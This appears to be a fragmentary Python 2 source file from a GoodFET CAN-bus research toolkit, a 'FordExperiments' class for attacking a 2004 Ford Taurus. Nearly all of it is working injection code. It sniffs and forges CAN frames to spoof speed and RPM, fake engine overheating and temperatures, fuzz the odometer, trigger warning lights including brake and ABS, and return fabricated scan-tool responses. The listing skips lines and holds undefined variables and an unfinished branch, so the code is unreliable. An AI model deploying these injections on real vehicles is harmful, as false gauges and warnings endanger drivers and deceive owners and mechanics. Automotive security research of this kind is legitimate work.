4 import csv, time, argparse;
8 from random import randrange
9 from GoodFETMCPCAN import GoodFETMCPCAN;
10 from experiments import experiments
11 from GoodFETMCPCANCommunication import GoodFETMCPCANCommunication
12 from intelhex import IntelHex;
17 class FordExperiments(experiments):
19 This class is a subclass of experiments and is a car specific module for
20 demonstrating and testing hacks.
22 def __init__(self, dataLocation = "../../contrib/ThayerData/"):
23 GoodFETMCPCANCommunication.__init__(self, dataLocation)
24 #super(FordExperiments,self).__init__(self) #initialize chip
27 def mimic1056(self,packetData,runTime):
30 self.spitSetup(self.freq)
31 #FIGURE out how to clear buffers
32 self.addFilter([1056, 1056, 1056, 1056,1056, 1056], verbose=False)
33 packet1 = self.client.rxpacket();
35 packetParsed = self.client.packet2parsed(packet1);
36 #keep sniffing till we read a packet
37 while( packet1 == None or packetParsed.get('sID') != 1056 ):
38 packet1 = self.client.rxpacket()
40 packetParsed = self.client.packet2parsed(packet1)
41 recieveTime = time.time()
42 packetParsed = self.client.packet2parsed(packet1)
43 if( packetParsed['sID'] != 1056):
44 print "Sniffed wrong packet"
46 countInitial = ord(packetParsed['db3']) #initial count value
48 #set data packet to match what was sniffed or at least what was input
51 if(packetData.get(idx) == None):
52 packet.append(ord(packetParsed.get(idx)))
54 packet.append(packetData.get(idx))
56 #### split SID into different regs
57 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
58 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
59 packet = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
60 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
62 packet[0],packet[1],packet[2],packet[3],packet[4],packet[5],packet[6],packet[7]]
64 self.client.txpacket(packet);
66 while( (time.time()-recieveTime) < runTime):
67 #care about db3 or packet[8] that we want to count at the rate that it is
68 dT = time.time()-tpast
70 db3 = (countInitial + math.floor((time.time()-recieveTime)/0.2))%255
72 self.client.txpacket(packet)
76 self.client.MCPrts(TXB0=True)
77 tpast = time.time() #update our transmit time on the one before
81 def cycledb1_1056(self,runTime):
85 #FIGURE out how to clear buffers
86 self.addFilter([1056, 1056, 1056, 1056,1056, 1056], verbose=False)
87 packet1 = self.client.rxpacket();
89 packetParsed = self.client.packet2parsed(packet1);
90 #keep sniffing till we read a packet
91 while( packet1 == None or packetParsed.get('sID') != 1056 ):
93 packet1 = self.client.rxpacket()
95 packetParsed = self.client.packet2parsed(packet1)
96 recieveTime = time.time()
97 packetParsed = self.client.packet2parsed(packet1)
98 if( packetParsed['sID'] != 1056):
99 print "Sniffed wrong packet"
102 #set data packet to match what was sniffed or at least what was input
105 packet.append(ord(packetParsed.get(idx)))
107 packet[1] = packetValue;
110 #### split SID into different regs
111 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
112 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
113 packet = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
114 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
115 # lower nibble is DLC
116 packet[0],packet[1],packet[2],packet[3],packet[4],packet[5],packet[6],packet[7]]
118 self.client.txpacket(packet);
120 while( (time.time()-recieveTime) < runTime):
121 #care about db3 or packet[8] that we want to count at the rate that it is
122 dT = time.time()-tpast
125 #temp = ((packetValue+1))%2
127 # pV = packetValue%255
133 self.client.txpacket(packet)
135 tpast = time.time() #update our transmit time on the one before
138 def getBackground(self,sId):
140 This method gets the background packets for the given id. This
141 is a simple "background" retriever in that it returns the packet
142 that is of the given id that was sniffed off the bus.
144 packet1 = self.client.rxpacket();
146 packetParsed = self.client.packet2parsed(packet1);
147 #keep sniffing till we read a packet
148 startTime = time.time()
149 while( packet1 == None or packetParsed.get('sID') != sId and (time.time() - startTime) < 20):
150 packet1 = self.client.rxpacket()
152 packetParsed = self.client.packet2parsed(packet1)
154 #recieveTime = time.time()
157 def cycle4packets1279(self):
158 self.client.serInit()
161 self.addFilter([1279, 1279, 1279, 1279, 1279, 1279], verbose = False)
162 packetParsed = self.getBackground(1279)
164 if (packetParsed[db0] == 16):
165 # if it's the first of the four packets, replace the value in db7 with 83
166 packetParsed[db7] = 83
167 # transmit new packet
168 self.client.txpacket(packetParsed)
170 # otherwise, leave it alone
171 # transmit same pakcet we read in
172 self.client.txpacket(packetParsed)
173 # print the packet we are transmitting
176 def oscillateMPH(self,runTime):
177 self.client.serInit()
179 #FIGURE out how to clear buffers
180 self.addFilter([513, 513, 513, 513,513, 513], verbose=False)
181 packetParsed = self.getBackground(513)
183 #set data packet to match what was sniffed or at least what was input
186 packet.append(packetParsed.get(idx))
188 packet[1] = packetValue;
191 #### split SID into different regs
192 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
193 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
194 packet = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
195 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
196 # lower nibble is DLC
197 packet[0],packet[1],packet[2],packet[3],packet[4],packet[5],packet[6],packet[7]]
199 self.client.txpacket(packet);
200 startTime = tT.time()
201 while( (tT.time()-startTime) < runTime):
202 dt = tT.time()-startTime
203 inputValue = ((2.0*math.pi)/20.0)*dt
204 value = 35*math.sin(inputValue)+70
210 #packet[9] = int(value)
211 packet[5] = int(value)
213 self.client.txpacket(packet)
215 def oscillateTemperature(self,runTime):
221 self.client.serInit()
223 #FIGURE out how to clear buffers
224 self.addFilter([1056, 1056, 1056, 1056,1056, 1056], verbose=False)
225 packetParsed = self.getBackground(1056)
227 #set data packet to match what was sniffed or at least what was input
230 packet.append(packetParsed.get(idx))
232 packet[1] = packetValue;
235 #### split SID into different regs
236 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
237 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
238 packet = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
239 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
240 # lower nibble is DLC
241 packet[0],packet[1],packet[2],packet[3],packet[4],packet[5],packet[6],packet[7]]
243 self.client.txpacket(packet);
244 startTime = tT.time()
245 while( (tT.time()-startTime) < runTime):
246 dt = tT.time()-startTime
247 inputValue = ((2.0*math.pi)/20.0)*dt
248 value = 30*math.sin(inputValue)+130
250 #packet[5] = int(value)
257 self.client.txpacket(packet)
259 #tpast = time.time() #update our transmit time on the one before
264 #reset eveything on the chip
265 self.client.serInit()
267 duration = 20; #seconds
270 listenPacket = [2, 9, 6, 153, 153, 153, 153, 153]
272 #actual response by the car
273 #r1 = [34, 88, 0, 0, 0, 0, 0, 0]
274 #r2 = [33, 75, 50, 78, 51, 46, 72, 69 ]
275 #r3 = [16, 19, 73, 4, 1, 70, 65, 66]
277 r1 = [34, 88, 0, 0, 0, 0, 0, 0]
278 r2 = [33, 75, 50, 78, 51, 46, 72, 69 ]
279 r3 = [16, 19, 73, 160, 159, 70, 65, 66]
282 SIDlow = (responseID & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
283 SIDhigh = (responseID >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
284 packet1 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
285 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
286 # lower nibble is DLC
287 r1[0],r1[1],r1[2],r1[3],r1[4],r1[5],r1[6],r1[7]]
288 packet2 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
289 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
290 # lower nibble is DLC
291 r2[0],r2[1],r2[2],r2[3],r2[4],r2[5],r2[6],r2[7]]
292 packet3 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
293 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
294 # lower nibble is DLC
295 r3[0],r3[1],r3[2],r3[3],r3[4],r3[5],r3[6],r3[7]]
297 self.multiPacketSpit(packet0 = r1, packet1 = r2, packet2 = r3, packet0rts = True, packet1rts = True, packet2rts = True)
299 #filter for the correct packet
300 self.filterForPacket(listenID, listenPacket[0],listenPacket[1], verbose = True)
301 self.client.rxpacket()
302 self.client.rxpacket() # flush buffers if there is anything
303 startTime = tT.time()
304 while( (tT.time() -startTime) < duration):
305 packet = self.client.rxpacket()
307 sid = ord(packet[0])<<3 | ord(packet[1])>>5
308 if( sid == listenID):
309 byte3 = ord(packet[6])
310 if( byte3 == listenPacket[3]):
311 print "SendingPackets!"
313 self.multpackSpit(packet0rts=True,packet1rts=True,packet2rts=True)
315 def setScanToolTemp(self,temp):
316 self.client.serInit()
319 self.addFilter([2024, 2024, 2024])
320 self.client.rxpacket()
321 self.client.rxpacket()
322 self.client.rxpacket()
323 SIDlow = (2024 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
324 SIDhigh = (2024 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
326 startTime = time.time()
327 #while((time.time() - startTime) < 10):
331 # catch a packet and check its db4 value
332 while (packet == None):
333 packet=self.client.rxpacket();
336 newTemp = math.ceil(level/1.8 + 22)
337 #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
340 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
341 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
342 # lower nibble is DLC
343 ord(packet[5]),ord(packet[6]),ord(packet[7]),newTemp,ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
345 # load new packet into TXB0 and check time
346 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
347 starttime = time.time()
349 # spit new value for 1 second
350 while (time.time()-starttime < 10):
351 self.multiPacketSpit(packet0rts=True)
353 def overHeatEngine(self):
354 self.client.serInit()
357 self.addFilter([1056, 1056, 1056])
358 packet = self.getBackground(1056)
359 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
360 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
362 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
363 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
364 # lower nibble is DLC
365 0xfa,packet['db1'],packet['db2'],packet['db3'],packet['db4'],packet['db5'],packet['db6'],packet['db7']]
366 startTime = time.time()
367 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
368 while( time.time()- startTime < 10):
369 self.multiPacketSpit(packet0rts=True)
371 def runOdometer(self):
372 self.client.serInit()
375 self.addFilter([1056, 1056, 1056])
376 packet = self.getBackground(1056)
377 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
378 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
379 odomFuzz = random.randint(0,255)
381 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
382 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
383 # lower nibble is DLC
384 packet['db0'],packet['db1'],packet['db2'],packet['db3'],packet['db4'],packet['db5'],packet['db6'],packet['db7']]
386 startTime = time.time()
387 packet[6] = odomFuzz;
388 while( time.time()- startTime < 10):
389 odomFuzz = random.randint(0,255)
390 newPacket[6] = odomFuzz
391 self.client.txpacket(newPacket)
393 def setDashboardTemp(self, temp):
394 self.client.serInit()
397 self.addFilter([1056, 1056, 1056])
398 self.client.rxpacket()
399 self.client.rxpacket()
400 self.client.rxpacket()
401 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
402 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
404 startTime = time.time()
405 #while((time.time() - startTime) < 10):
409 # catch a packet and check its db4 value
410 while (packet == None):
411 packet=self.client.rxpacket();
414 newTemp = math.ceil(level/1.8 + 22)
415 #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
418 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
419 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
420 # lower nibble is DLC
421 newTemp,ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
423 # load new packet into TXB0 and check time
424 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
425 starttime = time.time()
427 # spit new value for 1 second
428 while (time.time()-starttime < 10):
429 self.multiPacketSpit(packet0rts=True)
432 def warningLightsOn(self,checkEngine, checkTransmission, transmissionOverheated, engineLight, battery, fuelCap, checkBreakSystem,ABSLight):
433 self.addFilter([1056, 1056, 530, 530, 1056])
434 if( checkBreakSystem == 1 or ABSLight == 1):
435 SIDlow = (530 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
436 SIDhigh = (530 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
437 packet = self.getBackground(530)
438 packet2 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
439 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
440 # lower nibble is DLC
441 ord(packet[5]),ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
442 if( checkBreakSystem == 1 and ABSLight == 1):
444 elif( checkBreakSystem == 0 and ABSLight == 1):
446 elif(checkBreakSystem==1 and ABSLight == 0):
453 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
454 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
455 packet = self.getBackground(1056)
456 packet1 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
457 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
458 # lower nibble is DLC
459 ord(packet[5]),ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
460 if( checkEngine == 1):
463 if( checkTransmission == 1):
466 if( transmissionOverheated == 1):
469 if( engineLight == 1):
478 # load new packet into TXB0 and check time
479 self.multiPacketSpit(packet0=packet1,packet1=packet2, packet0rts=True,packet1rts=packet2rts )
480 starttime = time.time()
482 # spit new value for 1 second
483 while ((time.time()-starttime) < 10):
484 self.multiPacketSpit(packet0rts=True,packet1rts = packet2rts)
486 def fakeScanToolFuelLevel(self,level):
487 self.client.serInit()
490 self.addFilter([2024, 2024, 2024])
491 self.client.rxpacket()
492 self.client.rxpacket()
493 self.client.rxpacket()
494 SIDlow = (2024 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
495 SIDhigh = (2024 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
497 startTime = time.time()
498 #while((time.time() - startTime) < 10):
502 # catch a packet and check its db4 value
503 while (packet == None):
504 packet=self.client.rxpacket();
506 level = int(level/.4)
507 #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
510 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
511 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
512 # lower nibble is DLC
513 3,65,47,level,ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
515 # load new packet into TXB0 and check time
516 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
517 starttime = time.time()
519 # spit new value for 1 second
520 while (time.time()-starttime < 10):
521 self.multiPacketSpit(packet0rts=True)
523 def fakeOutsideTemp(self,level):
524 self.client.serInit()
527 self.addFilter([2024, 2024, 2024,2024,2024,2024])
528 self.client.rxpacket()
529 self.client.rxpacket()
530 self.client.rxpacket()
531 SIDlow = (2024 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
532 SIDhigh = (2024 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
534 startTime = time.time()
535 #while((time.time() - startTime) < 10):
539 # catch a packet and check its db4 value
540 while (packet == None):
541 packet=self.client.rxpacket();
543 newTemp = int(math.ceil(level/1.8 + 22))
544 #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
547 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
548 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
549 # lower nibble is DLC
550 03,65,70,newTemp,0,0,0,0]
552 # load new packet into TXB0 and check time
553 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
554 starttime = time.time()
556 # spit new value for 1 second
557 while (time.time()-starttime < 10):
558 self.multiPacketSpit(packet0rts=True)
561 def fakeAbsTps(self,level):
562 self.client.serInit()
565 self.addFilter([2024, 2024, 2024])
566 self.client.rxpacket()
567 self.client.rxpacket()
568 self.client.rxpacket()
569 SIDlow = (2024 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
570 SIDhigh = (2024 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
572 startTime = time.time()
573 #while((time.time() - startTime) < 10):
577 # catch a packet and check its db4 value
578 while (packet == None):
579 packet=self.client.rxpacket();
581 abstps = int(math.ceil(level/.39))
585 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
586 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
587 # lower nibble is DLC
588 ord(packet[5]),ord(packet[6]),ord(packet[7]),abstps,ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
590 # load new packet into TXB0 and check time
591 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
592 starttime = time.time()
594 # spit new value for 1 second
595 while (time.time()-starttime < 10):
596 self.multiPacketSpit(packet0rts=True)
600 def mphToByteValue(self, mph):
601 return ( mph + 63.5 ) / 1.617
603 def ByteValuToMph(self, value):
604 return 1.617*ord(packet[9]) - 63.5
606 def setMPH(self, mph):
607 self.client.serInit()
610 self.addFilter([513, 513, 513])
611 self.client.rxpacket()
612 self.client.rxpacket()
613 self.client.rxpacket()
614 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
615 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
617 startTime = time.time()
618 #while((time.time() - startTime) < 10):
622 # catch a packet and check its db4 value
623 while (packet == None):
624 packet=self.client.rxpacket();
626 #print self.client.packet2str(packet)
628 #print "DB4 = %02d " %ord(packet[9])
630 #print "Current MPH = 1.617(%d)-63.5 = %d" %(ord(packet[9]), mph)
632 # calculate our new mph and db4 value
634 newSpeed = self.mphToByteValue(mph)
635 #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
638 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
639 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
640 # lower nibble is DLC
641 ord(packet[5]),ord(packet[6]),ord(packet[7]),ord(packet[8]),int(newSpeed),ord(packet[10]),ord(packet[11]),ord(packet[12])]
643 # load new packet into TXB0 and check time
644 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
645 starttime = time.time()
647 # spit new value for 1 second
648 while (time.time()-starttime < 10):
649 self.multiPacketSpit(packet0rts=True)
652 def speedometerHack(self, inputs):
654 self.client.serInit()
657 self.addFilter([513, 513, 513])
659 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
660 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
666 # catch a packet and check its db4 value
667 while (packet == None):
668 packet=self.client.rxpacket();
670 print self.client.packet2str(packet)
672 print "DB4 = %02d " %ord(packet[9])
673 mph = 1.617*ord(packet[9]) - 63.5
674 print "Current MPH = 1.617(%d)-63.5 = %d" %(ord(packet[9]), mph)
676 # calculate our new mph and db4 value
677 mph = mph + inputs[0];
678 newSpeed = ( mph + 63.5 ) / 1.617
679 print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
682 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
683 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
684 # lower nibble is DLC
685 ord(packet[5]),ord(packet[6]),ord(packet[7]),ord(packet[8]),int(newSpeed),ord(packet[10]),ord(packet[11]),ord(packet[12])]
687 # load new packet into TXB0 and check time
688 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
689 starttime = time.time()
691 # spit new value for 1 second
692 while (time.time()-starttime < 1):
693 self.multiPacketSpit(packet0rts=True)
695 def rpmToByteValue(self, rpm):
696 value = ( rpm + 61.88 ) / 64.5
699 def ValueTorpm(self, value):
700 rpm = 64.5*value - 61.88
703 def setRPM(self, rpm):
704 self.client.serInit()
707 self.addFilter([513, 513, 513,513])
709 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
710 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
713 self.client.rxpacket()
714 self.client.rxpacket()
715 self.client.rxpacket()
717 startTime = tT.time()
718 while((tT.time() - startTime )< 10):
722 # catch a packet and check its db4 value
723 while (packet == None):
724 packet=self.client.rxpacket();
726 #print self.client.packet2str(packet)
728 #print "DB4 = %02d " %ord(packet[5])
730 #print "Current RPM = 64.5(%d)-61.88 = %d" %(ord(packet[5]), rpm)
732 newRPM = self.rpmToByteValue(rpm)
733 #print "Fake RPM = 64.5(%d)-61.88 = %d" %(newRPM, rpm)
736 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
737 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
738 # lower nibble is DLC
739 int(newRPM),ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
741 # load new packet into TXB0 and check time
742 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
743 starttime = time.time()
745 # spit new value for 1 second
746 while (time.time()-starttime < 1):
747 self.multiPacketSpit(packet0rts=True)
749 def rpmHack(self, inputs):
751 This method will increase the rpm by the given rpm amount.
754 @param inputs: Single element of a list that corresponds to the amount the user
758 self.client.serInit()
761 self.addFilter([513, 513, 513])
763 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
764 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
765 startTime = tT.time()
766 while((tT.time() - startTime )< 10):
770 # catch a packet and check its db4 value
771 while (packet == None):
772 packet=self.client.rxpacket();
774 print self.client.packet2str(packet)
776 print "DB4 = %02d " %ord(packet[5])
777 rpm = 64.5*ord(packet[5]) - 61.88
778 print "Current RPM = 64.5(%d)-61.88 = %d" %(ord(packet[5]), rpm)
780 # calculate our new mph and db4 value
781 rpm = rpm + inputs[0];
782 newRPM = ( rpm + 61.88 ) / 64.5
784 print "Fake RPM = 64.5(%d)-61.88 = %d" %(newRPM, rpm)
787 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
788 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
789 # lower nibble is DLC
790 int(newRPM),ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
792 # load new packet into TXB0 and check time
793 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
794 starttime = time.time()
796 # spit new value for 1 second
797 while (time.time()-starttime < 1):
798 self.multiPacketSpit(packet0rts=True)
803 if __name__ == "__main__":
805 parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,description='''\
807 Run Hacks on a Ford taurus 2004:
813 parser.add_argument('verb', choices=['speedometerHack', 'rpmHack']);
814 parser.add_argument('-v', '--variable', type=int, action='append', help='Input values to the method of choice', default=None);
817 args = parser.parse_args();
818 inputs = args.variable
819 fe = FordExperiments("../../contrib/ThayerData/");
821 if( args.verb == 'speedometerHack'):
822 fe.speedometerHack(inputs=inputs)
823 if( args.verb == 'rpmHack'):
824 fe.rpmHack(inputs=inputs)
825 elif( args.verb == 'fakeVIN'):